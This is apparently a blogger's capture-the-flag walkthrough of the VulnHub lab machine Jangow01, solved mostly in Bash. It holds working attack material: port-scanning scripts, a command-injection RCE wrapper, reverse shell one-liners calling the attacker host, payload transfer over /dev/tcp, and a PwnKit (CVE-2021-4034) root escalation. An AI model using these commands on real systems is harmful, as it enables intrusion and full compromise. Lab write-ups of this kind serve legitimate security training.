I solved Jangow01 using only Bash!!!

In this series of posts, I try to use only Bash and some external tools only if extremely needed.

Let’s start with Jangow01!!! You can download Jangow01 in vulnhub.com

Enumeration

Let’s make a script to find hosts online:

1
2
3

for ip in {0..255};do
  ping -c 1 192.168.56.$ip >/dev/null && echo " 192.168.56.$ip is online"
done

But it takes a long time, let’s make it faster using async

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

#!/bin/env bash

# getHosts.sh
getIps(){
  ping -c 4 192.168.56.$ip >/dev/null && echo " 192.168.56.$ip is online"
  sleep 0.1
}

# Main program
for ip in {1..254};do
  # we use async for fast scanning
  getIps "$ip" &
done
wait

The script found 3 ips

Here 192.168.56.118 is the target (the jangow01 machine)

Getting open ports

Now that we found the target, we search for open ports, for this task we make another script using /dev/tcp/$ip/$port

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

#!/bin/env bash

# getServices.sh

# Enable job control
set -m 

# Only tcp ports
scan(){
  if timeout 1s bash -c "</dev/tcp/192.168.56.118/$1" &> /dev/null; then      
        echo "Port $1 is open"
  fi;
}

jobCtrl=0
for ip in {1..65535};do

  # Why we use this? A: to prevent cpu overload 
  if [ $jobCtrl -eq 50 ]; then
    wait -n # If we had 50 jobs running we wait to finish them
    jobCtrl=0
  fi

  # Asyncronous scan
  scan $ip & 
  jobCtrl=$((jobCtrl+1))

done
wait

After running the script, it shows open ports at 192.168.56.118

Analyzing open ports

I used the curl tool to check the responses from the server

1

 curl 192.168.56.118

Cool!. but we only need to see hrer and src to get links

1

 curl -v --silent 192.168.56.118 2>&1 | grep -E "href|src" 

Analyzing the output, we find the ‘site/’ link, checking…

1

 curl 192.168.56.118/site/

But it returns a lot of code, again we look for the src and dst properties just to get links

1

 curl -v --silent 192.168.56.118/site/ 2>&1 | grep -E "href|src" 

The output shows a request that might be interesting:

1

href="busque.php?buscar="

Looking for some interesting answer we found RCE

1

 curl --get --data-urlencode "buscar=w" 192.168.56.118/site/busque.php

Exploiation

To save me a lot of writing, I made a script to help me with the RCE

1
2
3
4
5
6
7
8
9

#!/bin/env bash

# getRce.sh

while true;do
  read -p "comm>  " cmd
  curl --get  --data-urlencode "buscar=$cmd 2>&1" http://192.168.56.118/site/busque.php
  echo  " "
done

Getting more info

We check if we have write permissions

WordPress config file

Hidden files?

If we see the “/home” directory we get this:

Reverse shell

Cool!! we have the user his flag and credentials, now we use a simple reverse shell

1

  comm> bash -c 'bash -i >& /dev/tcp/192.168.56.1/222 0>&1'

Here we have some problems:

• all outgoing ports doesn’t work
• testing outgoing connections fail (ping)
• tools like dig, nslookup also fail

Outgoing port tester script

Replicating the same behavior on a Ubuntu server, I discovered that all or some ports are filtered by the firewall, checking /var/log on the Jangow01 vm, I found the ufw.log file, this indicates that ufw is active. Now we are going to find open outgoing ports (if they exist) for that I use the telnet utility (in this case for outgoing ports)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

#!/bin/env bash

# testPort.sh

runTelnet(){
  if timeout 5s telnet 192.168.56.11 $1 2>&1 | grep "Unable"; then
    echo "$1" > open
  fi
}

for port in {1..65535}; do

  runTelnet $port &
  if [[ -d open ]];then
    echo "Port $(cat open) is open"
    break
  fi
done

How to upload this script? we have two options:

• using ftp service and credentials found before (easy)
• or via RCE (easy too)

I prefer use RCE

1. We convert testPort.sh to base64 to get a single line

1

>tr -d "\n" < <(base64 testPort.sh) > out

2. Going up by RCE

1

curl --get  --data-urlencode "buscar=echo '$(cat out)' | base64 -d > run.sh 2>&1" http://192.168.56.118/site/busque.php

3. The script is already in the Jangow01 machine, finally we execute it

1

curl --get  --data-urlencode "buscar=bash run.sh &" http://192.168.56.118/site/busque.php

4. We check if the “open” file was created

1

curl --get  --data-urlencode "buscar=ls" http://192.168.56.118/site/busque.php

5. And we get the magic port

1

curl --get  --data-urlencode "buscar=cat open" http://192.168.56.118/site/busque.php

Now we open a connection on port 443 with nc

1
2
3
4
5

sudo nc -lvnp 443
Listening on 0.0.0.0 443

# We run this in the target machine
comm>  bash -c 'bash -i >& /dev/tcp/192.168.56.1/443 0>&1'

Cool!!!. we already have a remote shell

Privilege escalation

The flag is in the “/root” directory, but do we have a login shell or not? of course not, we are not logged in

We need a shell to login as user. trying some techniques only python3 worked

1

www-data@jangow01:/var/www/html/site$ python3 -c 'import pty; pty.spawn("/bin/bash")'

Now we log in with the credentials “jangow01” and “abygurl69”

Get Root

I saw that in many blogs to be root in Jangow01 they use different exploits for kernel but using these exploits are not the best way to be root because it is possible to cause crashes in the system and we could lose all the progress made so far

For jangow01 I tried some privilege escalation techniques but only found a SUID vulnerability

1

find / -perm -u=s -type f 2>/dev/null

Going through https://gtfobins.github.io/#+sudo I found a possible option

pkexec

But this doesn’t work

1

sudo pkexec /bin/sh

I found that pkexec has cve-2021-4034, a vulnerable version found in in this repo, after downloading PwnKit, it is no longer possible to upload the file on jangow01’s machine using base64 as before, for this I used nc on the port 443

1. First we start nc on port 443 and send PwnKit through a pipe

1

sudo nc -lvnp 443 < PwnKit

2. On the Jangow01 machine using the RCE we download the PwnKit file

1

comm>  bash -c 'cat < /dev/tcp/192.168.56.1/443 > PwnKit' &

3. Now we run PwnKit

Finally we get root

Happy hacking!

Usefull links

• ufw in ubuntu 20.04
• bash especial characters
• Privilege escalation in Linux
• Awesome Privilege escalation
• pkexec | gtfobins
• CVE-2021-4034
• Outgoing port tester
• port scanning whit nc
• nc listener
• Privilege escalation
• base64 encode decode
• bash/zsh sockets
• spawing tty shells
• tr lilnux command
• privesc-linux